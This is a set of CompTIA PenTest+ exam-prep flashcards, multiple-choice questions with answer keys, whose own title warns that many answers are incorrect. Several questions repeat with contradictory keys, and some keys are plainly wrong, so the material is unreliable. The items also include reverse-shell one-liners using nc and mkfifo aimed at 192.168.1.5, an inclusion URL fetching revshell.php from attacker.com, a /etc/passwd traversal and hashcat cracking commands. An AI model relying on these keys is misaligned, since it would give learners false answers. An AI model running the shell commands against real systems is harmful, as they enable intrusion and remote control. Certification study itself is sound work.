****DO NOT USE*** SO MANY INCORRECT ANSWERS ARE PROVIDED CompTIA Pentest PT0-001 (Exam Boost) Exam 1 Flashcards
A penetration tester has performed a security assessment for a startup firm.
The report lists a total of ten vulnerabilities, with five identified as critical.
The client does not have the resources to immediately remediate all vulnerabilities.
Under such circumstances, which of the following would be the BEST suggestion for the client?
A.Apply easy compensating controls for critical vulnerabilities to minimize the risk, and the re-prioritize remediation
B.Identify the issues that can be remediated most quickly and address them first
C.Implement the least impactful of the critical vulnerabilities remediation’s first and then address the other critical vulnerabilities
D.Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities over extended period of time
D.Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities over extended period of time
Which of the following is the reason why a pentester would run the following command at the end of an engagement? A.To remove the persistence B.To enable persistence C.To report persistence D.To check for persistence
A.To remove the persistence
A pentester wants to target NetBIOS name service.
Which of the following is the MOST Likely command to exploit the NetBIOS name service?
A.arpspoof
B.nmap
C.responder
D.burpsuite
A.arpspoof
A security consultant receives a document outlining the scope of an upcoming pentest.
This document contains IP addresses and times that each can be scanned.
Which of the following would contain this information? A.Rules of Engagement B.Request for Proposal C.Master Service Agreement D.Business Impact Analysis
A.Rules of Engagement
A pentester was able to an SQL injection commands into a text box and gain access to the information stored on the database.
Which of the following is the best recommendation that would mitigate the vulnerability?
A.Randomize the credentials used to log in.
B. Install host-based intrusion detection
C.Implement input normalization
D.Perform system hardening
C.Implement input normalization
Which of the following tools would a pentester use to conduct OSINT? A.Shodan B.SET C.BeEF D.Wireshark E.Maltego F.Dynamo
A.Shodan
E.Maltego
A pentester is performing ARP spoofing against a switch.
Which of the following should the pentester spoof to get the most information? A.MAC Address of the client B.MAC Address of the Domain Controller C.MAC address of the web server D.MAC address of the gateway
D.MAC address of the gateway
A pentester is able to move laterally throughout the domain with minimal roadblocks after compromising a single workstation.
Which of the following mitigation strategies would be BEST to recommend in the report?
(SELECT THREE)
A.Randomize local administrator credentials for each machine.
B.Disable remote logons for local administrators
C.Require multifactor authentication for all logins
D.Increase minimum password complexity requirements
E.Apply additional network access control
F.Enable Full-Disk Encryption on every workstation
G.Segment each host into its own VLAN
D.Increase minimum password complexity requirements
C.Require multifactor authentication for all logins
E.Apply additional network access control
A security consultant is trying to attack a device with a previously identified user account.
The consultation is utilizing metasploit SMB vulnerabilities and is able to dump hashes.
Which of the following types of attacks is being executed? A.Credential Dump Attack B.DLL Injection Attack C.Reverse Shell Attack D.Pass the hash attack
A.Credential Dump Attack
During a web application assessment, a pentester discovers that arbitrary commands can be executed on the server.
Wanting to take this attack one step further, the pentester begins to explore ways to gain a reverse shell back to the attack machine at 192.168.1.5.
Which of the following are possible ways to do so?
(CHOOSE TWO)
A.nc 192.168.1.5 44444
B.nc -nvlp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc 192.168.1.5 444444 > /tmp/f
D.nc -e /bin/sh 192.168.1.5 44444
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444 >/tmp/f
F.rm /tmpf;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f
B.nc -nvlp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc 192.168.1.5 444444 > /tmp/
Which of the following commands starts the Metasploit database? A.msfconsole B.workspace C.msfvenom D.db_init E.db_connect
A.msfconsole
A pentester is in the process of writing a report that outlines the overall level of risk to operations.
In which of the following areas of the report should the penetration tester put this? A.Appendixes B.Executive Summary C.Technical Summary D.Main Body
B.Executive Summary
A pentester identifies the following findings during an external vulnerability scan:
Vulnerability:
Multiple unsupported version of Apache found (Ports 80, 443)
SSLv3 accepted on HTTPS connections (443)
Mod_rewrite enabled on Apache servers (80,443)
Windows Server 2012 Host Found (21)
A.Obsolete software may contain exploitable components
B.Weak password management practices may be employed
C.Cryptographically weak protocols may be intercepted
D.Web server configurations may reveal sensitive information
D.Web server configurations may reveal sensitive information
Which of the following types of intrusion techniques is the use of an under-the-door tool during a physical security assessment an example of? A.Lockpicking B.Egress sensor triggering C.Lock bumping D.Lock bypass
D.Lock bypass
During a test, a critical vulnerability is discovered on a clients core server.
Which of the following should be the next action?
A.Disable the network port of the affected service
B.Complete all findings, and the submit them to the client
C.Promptly alert the client with details of the finding
D.Take the target offline so it cannot be exploited by an attacker
C.Promptly alert the client with details of the finding
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic.
The next step the pentester wants to take is to capture all the victim web traffic unencrypted.
Which of the following would meet this goal?
A.Perform an HTTP downgrade attack
B.Harvest the user credentials to decrypt traffic
C.Perform a MITM attack
D.Implement a CA attack by impersonating trusted CAs
A.Perform an HTTP downgrade attack
A pentester wants to script out a way to discover all the RPTR records for a range of IP address.
Which of the following is the MOST efficient to utilize?
A.nmap -p 53 -oG dnslist.txt | cut -d “;” -f4
B.nslookup -ns 8.8.8.8 «_space;dnslist.txt
C.for x in {1…254}; do dig -x 192.168.$x.$x;done
D.dig -r > echo “8.8.8.8”»_space; /etc/resolv.conf
D.dig -r > echo “8.8.8.8”»_space; /etc/resolv.conf
An engineer, who is conducting a pentest for a web application, discovers the user login process sends data using the HTTP get method.
To mitigate the risk of exposing sensitive information, the form should be sent using an:
A.HTTP POST method
B.HTTP OPTIONS method
C.HTTP PUT method
D.HTTP TRACE method
A.HTTP POST method
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s home folder titled ‘changepass’
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using string to print ASCII printable characters from changepass the tester notes the following:
$ strings changepass exit setuid strcmp GLIBC_ 2.0 ENV_PA TH %S/ changep w malloc strlen
Given this information, which of the following is the MOST likely path to exploitation to achieve root privileges on the machine?
A.Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass
B.Create a copy of changepass in the same directory naming it changepw. Export the ENV_PATH environment variable to the path ‘/home/user’. Then run changepass
C.Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw. Then run changepass.
D.Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin
D.Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?
A.Implement a blacklist
B.Block URL Redirections
C.Double URL encode the parameters
D.Stop external calls from the application
D.Stop external calls from the application
A pentester is performing a remote scan to determine if the server farm is compliant with the companys software baseline.
Which of the following should the pnentester perform to verify compliance with the baseline? A.Discovery Scan B.Stealth Scan C.Full Scan D.Credentialed Scan
D.Credentialed Scan
A pentester was able to retrieve the intial VPN user domain credentials by phishing a member of the IT department.
Afterward, the pentester obtained hashes over the VPN and easily cracked them with a dictionary attack.
Which of the following remediation steps should be recommended? (SELECT THREE)
A.Mandate all employees take security awareness training
B.Implement two-factor authentication for remote access
C.Install an Intrustion Prevention System
D.Increase Password Complexity
E.Install a security information event monitoring system
F.Prevent members of the IT department from interactively logging in as administrators
G.Upgrade the cipher suite used for the VPN solution
A.Mandate all employees take security awareness training
B.Implement two-factor authentication for remote access
D.Increase Password Complexity
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?
A.Implement a blacklist
B.Block URL Redirections
C.Double URL encode the parameters
D.Stop external calls from the application
B.Block URL Redirections
In which of the following scenarios would a tester perform a Kerberoasting attack?
A.The tester has compromised a Windows devices and dumps the LSA secrets
B.The tester needs to retrieve the SAM database and crack the password hashes
C.The tester has compromised a limited-privilege user and needs to target other acocunts for lateral movement
D.The tester has compromised an account and needs to dump hashes and plaintext passwords from the system
C.The tester has compromised a limited-privilege user and needs to target other acocunts for lateral movement
A pentester was able to retrieve the intial VPN user domain credentials by phishing a member of the IT department.
Afterward, the pentester obtained hashes over the VPN and easily cracked them with a dictionary attack.
Which of the following remediation steps should be recommended? (SELECT THREE)
A.Mandate all employees take security awareness training
B.Implement two-factor authentication for remote access
C.Install an Intrusion Prevention System
D.Increase Password Complexity
E.Install a security information event monitoring system
F.Prevent members of the IT department from interactively logging in as administrators
G.Upgrade the cipher suite used for the VPN solution
A.Mandate all employees take security awareness training
B.Implement two-factor authentication for remote access
D.Increase Password Complexity
A pentester is reviewing the following output from a wireless sniffer:
ESSID BSSID Encryption Channel WPS
Guest AD:1F:AB:10:33:78 OPEN 6 N
Secure AD:1F:AB:10:33:79 WPA2-PSK 6 N
Dev AD:1F:AB:10:33:70 WPA2-ENT 11 N
A.Hardware Vendor
B.Channel Interface
C.Usernames
D.Key Strength
C.Usernames
In which of the following scenarios would a tester perform a Kerberoasting attack?
A.The tester has compromised a Windows devices and dumps the LSA secrets
B.The tester needs to retrieve the SAM database and crack the password hashes
C.The tester has compromised a limited-privilege user and needs to target other acocunts for lateral movement
D.The tester has compromised an account and needs to dump hashes and plaintext passwords from the system
C.The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use? A.HKEY_CLASSES_ROOT B.HKEY_LOCAL_MACHINE C.HKEY_CURRENT_USER D.HKEY_CURRENT_CONFIG
C.HKEY_CURRENT_USER
A pentester is preparing to conduct API testing.
Which of the following would be MOST helpful in preparing for this engagement? A,Nikto B.WAR C.W3AF D.Swagger
D.Swagger
During an internal network pentest, a tester recovers the NTLM password hash for a user known to have full admin privileges on a number of target systems.
Effort to crack the hash and recover the plaintext password have been unsuccessful.
Which of the following would be the BEST target for continued exploitation efforts? A.Windows 7 (Ports 23, 161) B.Windows Server 2016 (Ports 53,5900) C. Windows 8.1 Open (Ports 445, 3389) D.Windows 8 (Ports 514,3389)
A.Windows 7 (Ports 23, 161)
A pentester delivers a web application vulnerability scan report to a client.
The pentester rates a vulnerability as medium severity.
The same vulnerability was reported as a critical finding on the previous report.
Which of the following is the most likely reason for the reduced severity?
A.The client has applied a hot fix without updating the version
B.The threat landscape has significantly changed
C.The client updated their codebase with new features
D.There are currently no known exploits for this vulnerability
A.The client has applied a hot fix without updating the version
An attacker uses SET to make a copy of a companys cloud hosted web mail portal and sends an email in hopes the CEO logs in to obtain the CEOs login credentials. A.Elicitation attack B.Impersonation attack C.Spear phishing D.Drive-by download attack
C.Spear phishing
A pentester is scanning a network for SSH and has a list of provided targets.
Which of the following nmap commands should the tester use? A.nmap -p 22 -iL targets B.nmap -p 22 -sL targets C.nmap -p 22 -oG targets D.nmap -p 22 -oA targets
A.nmap -p 22 -iL targets
A pentester has comrpomised a host. Which of the following would be the correct syntax to create a Netcat listener on the device? A.nc -l -p 4444 /bin/bash B.nc -vp 4444 /bin/bash C.nc -p 4444 /bin/bash D.nc -lp 4444 /bin/bash
D.nc -lp 4444 /bin/bash
A pentester has been assigned to perform an external pentest assessment of a company.
Which of the following would BEST help with passive information gathering?
A.Wait outside the company’s building and attempt to tailgate behind an employee
B.Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities and attempt to gain access
C.Use domain and IP registry websites to identify the companys external netblocks and external facing applications
D.Search social media for information technology employees who post information about the tech they work with
E.Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access
C.Use domain and IP registry websites to identify the companys external netblocks and external facing applications
A client asks a pentester to add more addresses to a test currently in progress.
Which of the following would define the target list? A.Rules of engagement B.Master Service Agreement C.Statement of Work D.End-User License Agreement
C.Statement of Work
Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when performing a pentest?
A.Pentest findings often contain intellectual property
B.Pentest findings could lead to consumer dissatisfaction if made public
C.Pentest findings are legal documents containing privileged information
D.Pentest findings can assist an attacker in compromising a system
D.Pentest findings can assist an attacker in compromising a system
A pentester has comrpomised a host. Which of the following would be the correct syntax to create a Netcat listener on the device? A.nc -l -p 4444 /bin/bash B.nc -vp 4444 /bin/bash C.nc -p 4444 /bin/bash D.nc -lp 4444 /bin/bash
A.nc -l -p 4444 /bin/bash
A pentester has been assigned to perform an external pentest assessment of a company.
Which of the following would BEST help with passive information gathering? (Choose two)
A.Wait outside the company’s building and attempt to tailgate behind an employee
B.Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities and attempt to gain access
C.Use domain and IP registry websites to identify the companys external netblocks and external facing applications
D.Search social media for information technology employees who post information about the tech they work with
E.Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access
C.Use domain and IP registry websites to identify the companys external netblocks and external facing applications
D.Search social media for information technology employees who post information about the tech they work with
A software development team recently migrated to new application software on the on-premise environment.
Pentest findings show that multiple vulnerabilities exist.
If a pentester does not have access to a live or test environment, a test might be better to create the same environment on the VM.
WHich of the following is most important for confirmation?
A.Unsecure service and protocol configuration
B.Running SMB and SMTP service
C.Weak password complexity and user account
D.Misconfiguration
D.Misconfiguration
A software development team recently migrated to new application software on the on-premise environment.
Pentest findings show that multiple vulnerabilities exist.
If a pentester does not have access to a live or test environment, a test might be better to create the same environment on the VM.
Which of the following is most important for confirmation?
A.Unsecure service and protocol configuration
B.Running SMB and SMTP service
C.Weak password complexity and user account
D.Misconfiguration
D.Misconfiguration
A pentester is checking a script to determine why some basic math errors are persisting
The expected result was the program outputting “True”.
root:~# cat ./test.sh #!/bin/bash source=10 let dest5=5
if ['source' = 'dest' ] ; then echo "True" else echo "False" fi #End of File
Given the output from the console above, which of the following explains how to correct the errors in the script?
(Choose Two)
A.Change ‘fi’ to ‘Endli’
B.Remove the ‘let’ in front of ‘dest=5+5’
C.Change the ‘=’ to ‘eq’
D.Change source and dest to “$source” and”$dest”
E.Change ‘else’ to ‘elif’
C.Change the ‘=’ to ‘eq’
E.Change ‘else’ to ‘elif’
After performing a security assessment for a firm, the client was found to have been billed for the time the clients test environment was unavailable.
The client claims to have been billed unfairly.
Which of the following documents would most likely be able to provide guidance in such a situation? A.SOW B.NDA C.EULA D.BPA
A.SOW
A software development team recently migrated to new application software on the on-premise environment.
Pentest findings show that multiple vulnerabilities exist.
If a pentester does not have access to a live or test environment, a test might be better to create the same environment on the VM.
Which of the following is most important for confirmation?
A.Unsecure service and protocol configuration
B.Running SMB and SMTP service
C.Weak password complexity and user account
D.Misconfiguration
A.Unsecure service and protocol configuration
A tester has captured a NetNTLMv2 hash using Responder.
Which of the following commands will allow the tester to crack the hash using a mask attack?
A.hashcat -m 5600 -r rule/bestG4.rule hash.txt wordlist.txt
B.hashcat -m 5600 hash.txt
C.hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?
D.hashcat -m 5600 -o results.text hash.txt wordlist.txt
C.hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?
A pentester has ran the following Nmap scan on a computer:
‘nmap -aV 192.168.1.5’
The organization said it had disabled telnet from its enviornemnt.
However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH.
Which of the following is the BEST explanation for what happened?
A.The organization failed to disable Telnet
B.Nmap results contain a false positive for port 23
C.Port 22 was filtered
D.The service is running on a non-standard port
D.The service is running on a non-standard port
A pentester has ran the following Nmap scan on a computer:
‘nmap -aV 192.168.1.5’
The organization said it had disabled telnet from its enviornemnt.
However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH.
Which of the following is the BEST explanation for what happened?
A.The organization failed to disable Telnet
B.Nmap results contain a false positive for port 23
C.Port 22 was filtered
D.The service is running on a non-standard port
D.The service is running on a non-standard port
Which of the following has a direct and significant impact on the budget of the security assessment? A.Scoping B.Scheduling C.Compliance requirement D.Target Risk
A.Scoping
During an internal pentest, several multicast and broadcast name resolution requests are observed traversing the network.
Which of the following tools could be used to imperonate network resources and collect authentication requests? A.Ettercap B.Tcpdump C.Responder D.Medusa
A.Ettercap
Given the following URL:
http://example.com/download.php?id-…/…/…/etc/passwd
Which of the following best describes the above attack?
A.Malicious file upload attack
B.Redirect attack
C.Directory traversal attack
D.Insecure direct object reference attack
C.Directory traversal attack
